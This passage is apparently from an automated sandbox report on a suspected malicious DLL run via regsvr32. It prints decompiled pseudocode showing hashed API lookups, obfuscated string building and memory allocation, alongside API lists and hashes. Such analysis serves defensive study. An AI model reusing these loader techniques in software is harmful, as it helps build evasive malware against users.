                  • Instruction Fuzzy Hash: FD214D71704B5982FAA2D7A5A4403AA7290ABDC7C0F14C621AE4D87B8ADE6CCA098715
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 435 180002464-180002482 LoadLibraryA 436 180002484-180002495 call 180007b94 435->436 437 1800024af-1800024b5 GetLastError 435->437 441 1800024a4-1800024ad FreeLibrary 436->441 442 180002497-1800024a2 436->442 438 1800024b7-1800024c8 437->438 441->438 442->438
                  C-Code - Quality: 25%
                  			E00000001180002464(void* __rax, long long __rbx, long long* __rdx, long long __rsi, long long _a8, long long _a16, void* _a24) {
                  				long long _t20;
                  				void* _t24;
                  				void* _t31;
                  				void* _t32;
                  
                  				_a8 = __rbx;
                  				_a16 = __rsi;
                  				LoadLibraryA(??); // executed
                  				_t24 = __rax;
                  				if (__rax == 0) goto 0x800024af;
                  				if (E00000001180007B94(__rax,  &_a24, _t31, _t32) != 0) goto 0x800024a4;
                  				_t20 = _a24;
                  				 *_t20 = _t24;
                  				 *__rdx = _t20;
                  				goto 0x800024b7;
                  				FreeLibrary(??);
                  				goto 0x800024b7;
                  				return GetLastError();
                  			}







                  0x180002464
                  0x180002469
                  0x180002476
                  0x18000247c
                  0x180002482
                  0x180002495
                  0x180002497
                  0x18000249c
                  0x18000249f
                  0x1800024a2
                  0x1800024a7
                  0x1800024ad
                  0x1800024c8

                  APIs
                  • LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • GetLastError.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024AF
                    • Part of subcall function 0000000180007B94: RtlAllocateHeap.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C13
                    • Part of subcall function 0000000180007B94: memset.NTDLL(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000180008B7D,?,?,00000000), ref: 0000000180007C35
                  • FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Library$AllocateErrorFreeHeapLastLoadmemset
                  • String ID:
                  • API String ID: 105124555-0
                  • Opcode ID: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction ID: 15b41fa467f29f274ac49399cf4168cd092f7d47ffdb68e5546afb005077a2c4
                  • Opcode Fuzzy Hash: 87bd12416fb62ea3d1556e717187c020765267e15b714ec180dccf21d281dbfb
                  • Instruction Fuzzy Hash: 6EF01231705B8982EB96CB55B5543A973A4BB9CBD0F54C020FB5943B49EF38C559C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 52%
                  			E00000001180003798(signed int __ecx, long long* __rax, long long __rbx, intOrPtr* __rcx, signed int __rdx, void* __r8) {
                  				signed int _t45;
                  				intOrPtr _t52;
                  				void* _t65;
                  				long long* _t68;
                  				signed long long _t72;
                  				void* _t85;
                  				void* _t87;
                  				long long _t89;
                  				void* _t92;
                  				void* _t93;
                  				void* _t99;
                  				void* _t102;
                  				void* _t103;
                  				void* _t105;
                  				void* _t108;
                  
                  				_t68 = __rax;
                  				_t45 = __ecx;
                  				_t99 = _t92;
                  				 *((long long*)(_t99 + 0x10)) = __rbx;
                  				 *((long long*)(_t99 + 0x18)) = _t89;
                  				_t93 = _t92 - 0x40;
                  				_t52 = r9d;
                  				_t26 =  <  ? r9d : 0x1000;
                  				_t103 = __r8;
                  				 *((intOrPtr*)(_t99 + 0x20)) =  <  ? r9d : 0x1000;
                  				E0000000118000459C(0xdc630174, __rax,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t68 == 0) goto 0x8000381d;
                  				asm("sbb ecx, ecx");
                  				_t72 =  ~__rdx;
                  				asm("inc ebp");
                  				 *(_t93 + 0x30) =  *(_t93 + 0x30) & 0x00000000;
                  				 *((intOrPtr*)(_t93 + 0x28)) = _t52;
                  				 *(_t93 + 0x20) = _t45 &  *(_t93 + 0x88);
                  				 *_t68(_t108, _t105, _t102, _t85, _t87); // executed
                  				goto 0x8000381f;
                  				if (0 != 0) goto 0x80003890;
                  				if (GetLastError() != 0x2f8f) goto 0x80003876;
                  				 *((intOrPtr*)(_t93 + 0x70)) = 0x3300;
                  				if (0 != 0) goto 0x800038dc;
                  				E0000000118000459C(0xe7f09937, _t72,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t72 == 0) goto 0x80003869;
                  				_t14 = _t87 + 4; // 0x4
                  				r9d = _t14;
                  				 *_t72();
                  				goto 0x8000386b;
                  				if (0 == 0) goto 0x80003884;
                  				goto 0x8000387d;
                  				if (0 != 0x2f00) goto 0x8000388c;
                  				goto 0x800037d2;
                  				if (GetLastError() != 0) goto 0x800038dc;
                  				_t65 = _t103;
                  				if (_t65 == 0) goto 0x800038dc;
                  				if (_t65 == 0) goto 0x800038dc;
                  				E0000000118000459C(0xcb679d89, _t72,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t72 == 0) goto 0x800038ce;
                  				r8d = _t52 -  *(_t93 + 0x88);
                  				 *_t72();
                  				goto 0x800038d0;
                  				if (0 != 0) goto 0x800038dc;
                  				return GetLastError();
                  			}


















                  0x180003798
                  0x180003798
                  0x180003798
                  0x18000379b
                  0x18000379f
                  0x1800037ab
                  0x1800037be
                  0x1800037c1
                  0x1800037c5
                  0x1800037cb
                  0x1800037db
                  0x1800037e6
                  0x1800037f7
                  0x180003800
                  0x180003803
                  0x180003806
                  0x18000380c
                  0x180003810
                  0x180003818
                  0x18000381b
                  0x180003821
                  0x180003830
                  0x180003832
                  0x18000383c
                  0x18000384b
                  0x180003853
                  0x180003859
                  0x180003859
                  0x180003865
                  0x180003867
                  0x18000386d
                  0x180003874
                  0x18000387b
                  0x18000387f
                  0x18000388e
                  0x180003890
                  0x180003893
                  0x18000389c
                  0x1800038a7
                  0x1800038af
                  0x1800038c7
                  0x1800038ca
                  0x1800038cc
                  0x1800038d2
                  0x1800038f6

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorLast
                  • String ID:
                  • API String ID: 1452528299-0
                  • Opcode ID: f2c420c76b630dbde9be635b1a0a2799e127628071e741fee86cfc76d2d98ae6
                  • Instruction ID: 751b5ccbb4ed30b18e4ca4c9a719b417d78c129dcd65879b60b3e8381e7608ce
                  • Opcode Fuzzy Hash: f2c420c76b630dbde9be635b1a0a2799e127628071e741fee86cfc76d2d98ae6
                  • Instruction Fuzzy Hash: 1C416E327047498AEBE3DB669841BEA73A8AB8C7D4F14C525FE4983785DE34CA4D8700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E00000001180006DCC(long long __rbx, intOrPtr* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi) {
                  				int _t27;
                  				void* _t46;
                  				long long _t48;
                  				intOrPtr* _t63;
                  				long long _t65;
                  				intOrPtr* _t66;
                  				void* _t68;
                  				void* _t69;
                  				void* _t71;
                  				void* _t74;
                  				WCHAR* _t77;
                  				WCHAR* _t80;
                  
                  				_t48 = __rbx;
                  				_t46 = _t68;
                  				 *((long long*)(_t46 + 8)) = __rbx;
                  				 *((long long*)(_t46 + 0x10)) = _t65;
                  				 *((long long*)(_t46 + 0x18)) = __rsi;
                  				 *((long long*)(_t46 + 0x20)) = __rdi;
                  				_t69 = _t68 - 0x30;
                  				_t63 = __rcx;
                  				_t66 = __rdx;
                  				E000000011800089E4(__rbx,  *0x8000d490 + 0x180011220, __rdx, __rdi, __rcx, _t71);
                  				if ( *0x8000d4a0 == _t48) goto 0x80006e8a;
                  				 *_t66 =  *_t63;
                  				if (lstrlenW(_t80) - 0xe <= 0) goto 0x80006e4f;
                  				_t27 = lstrcmpiW(_t77); // executed
                  				if (_t27 == 0) goto 0x80006e7a;
                  				E00000001180002594(_t26, _t48,  *0x8000d4a0, _t63, _t69 + 0x20, _t74);
                  				r11d =  *((intOrPtr*)(_t69 + 0x20));
                  				 *_t66 =  *_t66 +  *((intOrPtr*)(_t69 + 0x24)) + r11d;
                  				 *((intOrPtr*)(_t66 + 4)) =  *((intOrPtr*)(_t66 + 4)) +  *((intOrPtr*)(_t69 + 0x28)) +  *((intOrPtr*)(_t69 + 0x2c));
                  				HeapFree(??, ??, ??);
                  				goto 0x80006e8f;
                  				return 8;
                  			}















                  0x180006dcc
                  0x180006dcc
                  0x180006dcf
                  0x180006dd3
                  0x180006dd7
                  0x180006ddb
                  0x180006de5
                  0x180006df7
                  0x180006dfe
                  0x180006e12
                  0x180006e1f
                  0x180006e24
                  0x180006e36
                  0x180006e45
                  0x180006e4d
                  0x180006e59
                  0x180006e5e
                  0x180006e6e
                  0x180006e77
                  0x180006e82
                  0x180006e88
                  0x180006eaf

                  APIs
                    • Part of subcall function 00000001800089E4: HeapAlloc.KERNEL32(?,?,?,0000000180006E17,?,?,?,?,00000000,00000001800052B1), ref: 0000000180008A5D
                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E2B
                  • lstrcmpiW.KERNELBASE(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E45
                  • HeapFree.KERNEL32(?,?,?,?,00000000,00000001800052B1), ref: 0000000180006E82
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrcmpilstrlen
                  • String ID:
                  • API String ID: 727816722-0
                  • Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
                  • Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 33%
                  			E00000001180006D04(long long __rbx, void* __rcx, long long __rsi, long long __r9) {
                  				intOrPtr _t30;
                  				intOrPtr _t35;
                  				long long* _t40;
                  				int _t49;
                  				long long _t53;
                  				long long* _t56;
                  				void* _t57;
                  				long long _t59;
                  				void* _t61;
                  				void* _t64;
                  
                  				_t59 = __r9;
                  				_t40 = _t56;
                  				 *((long long*)(_t40 + 8)) = __rbx;
                  				 *((long long*)(_t40 + 0x10)) = _t53;
                  				 *((long long*)(_t40 + 0x18)) = __rsi;
                  				_t57 = _t56 - 0x50;
                  				_t4 = _t49 + 0x10; // 0x10
                  				_t35 = _t4;
                  				 *((char*)(_t40 - 0x38)) = 8;
                  				_t30 =  <  ? r8d : _t35;
                  				 *((char*)(_t40 - 0x37)) = 2;
                  				 *((intOrPtr*)(_t40 - 0x34)) = 0x660e;
                  				r8d = _t30;
                  				 *((short*)(_t40 - 0x36)) = 0;
                  				 *((intOrPtr*)(_t40 - 0x30)) = _t35;
                  				memcpy(_t64, _t61, _t49);
                  				r11d = _t35;
                  				r11d = r11d - _t30;
                  				if (r8d == _t35) goto 0x80006d73;
                  				r8d = r11d;
                  				memset(??, ??, ??);
                  				E0000000118000459C(0x9ae4c678, _t40,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
                  				if (_t40 == _t49) goto 0x80006da2;
                  				r9d = 0;
                  				_t15 = _t59 + 0x1c; // 0x1c
                  				r8d = _t15;
                  				 *((long long*)(_t57 + 0x28)) = __r9;
                  				 *((intOrPtr*)(_t57 + 0x20)) = 0;
                  				 *_t40(); // executed
                  				goto 0x80006da4;
                  				if (0 != 0) goto 0x80006db0;
                  				return GetLastError();
                  			}













                  0x180006d04
                  0x180006d04
                  0x180006d07
                  0x180006d0b
                  0x180006d0f
                  0x180006d18
                  0x180006d28
                  0x180006d28
                  0x180006d37
                  0x180006d3b
                  0x180006d3f
                  0x180006d43
                  0x180006d4a
                  0x180006d4d
                  0x180006d51
                  0x180006d54
                  0x180006d59
                  0x180006d5c
                  0x180006d5f
                  0x180006d64
                  0x180006d6e
                  0x180006d7c
                  0x180006d84
                  0x180006d86
                  0x180006d91
                  0x180006d91
                  0x180006d95
                  0x180006d9a
                  0x180006d9e
                  0x180006da0
                  0x180006da6
                  0x180006dcb

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorLastmemcpymemset
                  • String ID:
                  • API String ID: 954129129-0
                  • Opcode ID: 95295f05be87c7c3f4886005b4998b098cb939ad94dc0b7d7ecc8385bb3953ea
                  • Instruction ID: b24fa6da6f7637d02e6406ae7bebfb633d62473b8d0dea1419b0e5df7442ba24
                  • Opcode Fuzzy Hash: 95295f05be87c7c3f4886005b4998b098cb939ad94dc0b7d7ecc8385bb3953ea
                  • Instruction Fuzzy Hash: FA21DE3772065486E7A2CB26D844B8E76A1F3CCBC0F198112EE5813B10CF74CA49CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701404475.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7c0000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID: R
                  • API String ID: 0-1466425173
                  • Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction ID: c82975d8fe1e790cfe5e0d1508a9c79e9505390b3db82d0d13a0d4f145fa4cf1
                  • Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction Fuzzy Hash: A7615231658688CFC7A4DB28C469F66BBE2FB98340FD8885DA08AC3251D629DDC5D702
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E00007FFA7FFA0AE61812(void* __eax, void* __edi, void* __esi, void* __esp, long long _a32, short _a62, short _a64, short _a66, short _a68, short _a70, short _a72, short _a74, short _a76, short _a78, short _a80, void* _a96, void* _a128, void* _a180, long long _a208) {
                  				short _t21;
                  				void* _t41;
                  
                  				_t21 = __eax + 0x5c;
                  				_a66 = _t21;
                  				goto 0xae6185c;
                  				_a72 = _t21;
                  				_a62 = 0x65;
                  				goto 0xae6183c;
                  				_a70 = 0x9b;
                  				goto 0xae61872;
                  				goto 0xae61846;
                  				_a64 = 0x38;
                  				goto E00007FFA7FFA0AE61812;
                  				_a74 = 0x45;
                  				goto 0xae618b5;
                  				goto 0xae61866;
                  				_a68 = 0x6f;
                  				goto 0xae61832;
                  				goto 0xae6181c;
                  				goto 0xae618a9;
                  				_a80 = 0;
                  				goto 0xae6187c;
                  				_a78 = 0x21;
                  				goto 0xae61889; // executed
                  				VirtualAlloc(??, ??, ??, ??); // executed
                  				_a32 = _a208;
                  				goto 0xae618da;
                  				r9d = 0x32;
                  				r9d = r9d + 0xe;
                  				goto 0xae618cb;
                  				goto 0xae618bf;
                  				_a76 = 0x74;
                  				goto 0xae61892;
                  				r8d = 0xf55;
                  				r8d = r8d + 0xab;
                  				goto 0xae618e8;
                  				r8d =  *((intOrPtr*)(_a208 + 8));
                  				goto 0xae61931;
                  				goto 0xae6189c;
                  				goto 0xae61924;
                  				_t41 = memcpy(__edi, __esi, 0);
                  				goto 0xae618ee;
                  				goto 0xae618fd;
                  				goto 0xae61908;
                  				return _t41;
                  			}





                  0x7ffa0ae61812
                  0x7ffa0ae61815
                  0x7ffa0ae6181a
                  0x7ffa0ae6181c
                  0x7ffa0ae6182b
                  0x7ffa0ae61830
                  0x7ffa0ae61835
                  0x7ffa0ae6183a
                  0x7ffa0ae61844
                  0x7ffa0ae61846
                  0x7ffa0ae61850
                  0x7ffa0ae61855
                  0x7ffa0ae6185a
                  0x7ffa0ae61864
                  0x7ffa0ae61866
                  0x7ffa0ae61870
                  0x7ffa0ae6187a
                  0x7ffa0ae61887
                  0x7ffa0ae6188b
                  0x7ffa0ae61890
                  0x7ffa0ae61895
                  0x7ffa0ae6189a
                  0x7ffa0ae6189c
                  0x7ffa0ae618a2
                  0x7ffa0ae618a7
                  0x7ffa0ae618a9
                  0x7ffa0ae618af
                  0x7ffa0ae618b3
                  0x7ffa0ae618bd
                  0x7ffa0ae618bf
                  0x7ffa0ae618c9
                  0x7ffa0ae618cb
                  0x7ffa0ae618d1
                  0x7ffa0ae618d8
                  0x7ffa0ae618e2
                  0x7ffa0ae618e6
                  0x7ffa0ae618ec
                  0x7ffa0ae618fb
                  0x7ffa0ae618fd
                  0x7ffa0ae61906
                  0x7ffa0ae61910
                  0x7ffa0ae6191d
                  0x7ffa0ae6191f

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.701767052.00007FFA0AE61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA0AE60000, based on PE: true
                  • Associated: 00000003.00000002.701752677.00007FFA0AE60000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.701778993.00007FFA0AE62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.701786113.00007FFA0AE63000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000003.00000002.701892733.00007FFA0AEE5000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7ffa0ae60000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID: ~
                  • API String ID: 4275171209-1707062198
                  • Opcode ID: 23c9a529b91b64a43622319348fc625be395018795599c90a3d137ab767d5f4f
                  • Instruction ID: 0bee0115ae9116d00d38813c25ad99d929fa2a89c9ce952a048ec420058c0392
                  • Opcode Fuzzy Hash: 23c9a529b91b64a43622319348fc625be395018795599c90a3d137ab767d5f4f
                  • Instruction Fuzzy Hash: B7412F77E0C592C2E275AB65F40037EA621EB927C0F648A76D68E47BD4FE2CE501A701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ErrorLast$CreateThread
                  • String ID:
                  • API String ID: 665435222-0
                  • Opcode ID: 33611ef75179cc0a7cf688456195da8b73a4d3b065f91bba2ce119b7dda03dec
                  • Instruction ID: a627022cb49e9541912d6ea488725a36f99cb9846cfda91d0a227d10bba4b38c
                  • Opcode Fuzzy Hash: 33611ef75179cc0a7cf688456195da8b73a4d3b065f91bba2ce119b7dda03dec
                  • Instruction Fuzzy Hash: 02017C31204748C7E7A1CF62A84039A7360F38CBE4F148625AB9D43B94CF38D6698704
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: ObjectSingleSleepWait
                  • String ID:
                  • API String ID: 309074506-0
                  • Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
                  • Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701404475.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7c0000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction ID: 650b51abefb7bfc0a69bee0b49c6425abe61e7b95d5b5d1c2652903fbe4d6ee7
                  • Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction Fuzzy Hash: 92514D70618B48DFD7A4DB28C058F6A7BE1FB88304F94881DB08BC7290D77C9A84DB12
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000003.00000002.701404475.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7c0000_regsvr32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction ID: bb476d1cc5c834d6595b207a4bdb6e6279f35f37600b63e816cba83325709f2b
                  • Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction Fuzzy Hash: 8F416C34658A88CFD664EB28C058F6A77E1FB8A300FD9456DF087C3252D73C9C809B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E00000001180008D78(void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
                  				void* _t77;
                  				void* _t88;
                  				intOrPtr _t91;
                  				void* _t96;
                  				char _t97;
                  				void* _t115;
                  				long long* _t157;
                  				void* _t158;
                  				long long _t160;
                  				char* _t162;
                  				long long _t163;
                  				char* _t178;
                  				char* _t179;
                  				void* _t203;
                  				long long _t204;
                  				void* _t208;
                  				intOrPtr* _t209;
                  				int _t211;
                  				void* _t215;
                  				void* _t216;
                  				void* _t235;
                  				long _t238;
                  				long _t244;
                  				void* _t246;
                  				CHAR* _t253;
                  				long long _t254;
                  
                  				_t235 = _t215;
                  				 *((long long*)(_t235 + 8)) = __rbx;
                  				 *((long long*)(_t235 + 0x10)) = __rdx;
                  				_t216 = _t215 - 0x40;
                  				r13d =  *0x8000d498;
                  				_t209 = __rcx;
                  				 *((long long*)(_t216 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				if (E00000001180002370(r13d ^ 0x55e7ce26,  *((intOrPtr*)( *0x8000d4a0 + 8)), __rdx, _t235) != 0) goto 0x800090ee;
                  				_t204 =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				_t157 =  *_t209;
                  				 *((long long*)(_t216 + 0x98)) = _t157;
                  				 *((long long*)(_t216 + 0x28)) = _t204;
                  				if ( *((intOrPtr*)(_t216 + 0x20)) == 0) goto 0x80008f65;
                  				r8d = lstrlenA(_t253) + 1;
                  				HeapAlloc(_t246, _t244, _t238);
                  				_t254 = _t157;
                  				if (_t157 == 0) goto 0x800090e4;
                  				memcpy(_t203, _t208, _t211);
                  				_t162 = _t254;
                  				if ( *_t162 == 0x20) goto 0x80008e46;
                  				if ( *_t162 != 9) goto 0x80008e4b;
                  				_t163 = _t162 + 1;
                  				goto 0x80008e3c;
                  				if ( *_t163 == 0) goto 0x80008ecc;
                  				lstrlenA(??);
                  				asm("cdq");
                  				_t12 = _t157 + 1; // 0x1
                  				r8d = _t12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t157 == 0) goto 0x80008ece;
                  				_t96 =  *_t163;
                  				if (_t96 == 0) goto 0x80008e99;
                  				if (_t96 == 0x20) goto 0x80008e95;
                  				_t178 = _t163 + 1;
                  				_t97 =  *_t178;
                  				if (_t97 != 0) goto 0x80008e87;
                  				if (_t97 != 0) goto 0x80008e9b;
                  				if (_t178 == 0) goto 0x80008eb5;
                  				 *_t178 = 0;
                  				_t179 = _t178 + 1;
                  				if ( *_t179 == 0x20) goto 0x80008eb0;
                  				if ( *_t179 != 9) goto 0x80008eb5;
                  				goto 0x80008ea6;
                  				 *_t157 = _t163;
                  				_t158 = _t157 + _t204;
                  				if (_t179 + 1 != 0) goto 0x80008e7e;
                  				goto 0x80008ed6;
                  				if (0 == 0) goto 0x80008f4f;
                  				E0000000118000958C( *((intOrPtr*)(_t216 + 0x98)) + 0x18);
                  				 *((long long*)(_t209 + 0x40)) = _t254;
                  				 *((long long*)(_t209 + 0x48)) =  *((intOrPtr*)(_t216 + 0x90));
                  				 *((intOrPtr*)(_t209 + 0x50)) = bpl;
                  				if ( *((char*)(_t209 + 0x70)) == 0) goto 0x80008f09;
                  				 *((char*)(_t209 + 0x70)) = 0;
                  				asm("lock and dword [esi+0x2c], 0xfffffffe");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t209 + 0x40)) == 0) goto 0x80008f3e;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80008f6a;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				if (0x57 != 0) goto 0x800090f3;
                  				if (E00000001180002370(r13d ^ 0x881e33f6, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090ee;
                  				_t77 = E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98);
                  				_t91 =  *((intOrPtr*)(_t216 + 0x98));
                  				if (_t77 != 0) goto 0x80008fd2;
                  				if (_t91 == 0) goto 0x800090ee;
                  				 *((intOrPtr*)(_t209 + 0x28)) = _t91;
                  				if (E00000001180002370(r13d ^ 0xa2dd2342, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x8000905e;
                  				_t39 = _t158 + 0x10; // 0x10
                  				_t88 = _t39;
                  				_t115 =  <  ?  *((void*)(_t216 + 0x90)) : _t88;
                  				E0000000118000958C( *_t209 + 0x18);
                  				r8d = _t115;
                  				memcpy(??, ??, ??);
                  				if (_t115 - _t88 >= 0) goto 0x80009043;
                  				r8d = _t88 - _t115;
                  				memset(??, ??, ??);
                  				LeaveCriticalSection(??);
                  				HeapFree(??, ??, ??);
                  				r13d = r13d ^ 0x1a1a0866;
                  				if (E00000001180002370(r13d, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090f3;
                  				if (E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98) == 0) goto 0x800090f3;
                  				if ( *((intOrPtr*)(_t216 + 0x98)) == 0) goto 0x800090f3;
                  				_t55 =  *_t209 + 0x18; // 0x28
                  				E0000000118000958C(_t55);
                  				GetSystemTimeAsFileTime(??);
